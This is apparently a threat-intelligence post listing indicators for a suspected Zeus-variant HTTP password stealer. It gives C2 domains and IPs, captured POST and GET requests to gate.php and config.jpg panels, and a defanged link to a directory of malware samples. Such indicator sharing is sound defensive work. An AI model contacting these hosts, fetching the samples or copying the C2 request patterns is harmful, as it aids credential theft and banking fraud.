indianmoneybag.in(HTTP Password Stealer Hosted In United States Provo Unified Layer)

Mybe Zeus variant.

Domains :

repository.certum.pl 213.222.201.175
www.download.windowsupdate.com 184.25.56.173
crl.certum.pl 213.222.201.210
myworkmustpayme.xyz 162.144.218.223
www.indianmoneybag.in 104.153.45.242
joemb009i.xyz 162.144.218.223
cryfreeman042.ddns.net 41.138.167.135

HTTP Requests :

http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php

POST /wp-content/themes/twentyfourteen/css/php/gate.php HTTP/1.0
Host: www.indianmoneybag.in
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 506
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://myworkmustpayme.xyz/wp-admin/css/panel/config.jpg

GET /wp-admin/css/panel/config.jpg HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: myworkmustpayme.xyz
Cache-Control: no-cache

Samples here : hxxp://seamenfox.eu/wp-includes/css/upload/

Hostin Infos :

http://whois.domaintools.com/162.144.218.223

kdsk3afdiolpgejs.onion.to(Zeus Variant Hosted In Germany Berlin Individual Network Berlin E.v.)

616design.info (Pony loader and Zeus banking malware hosted by fastit.net)

musicdisk.net(Zeus hosted in Germany Frankfurt Am Main Intergenia Ag)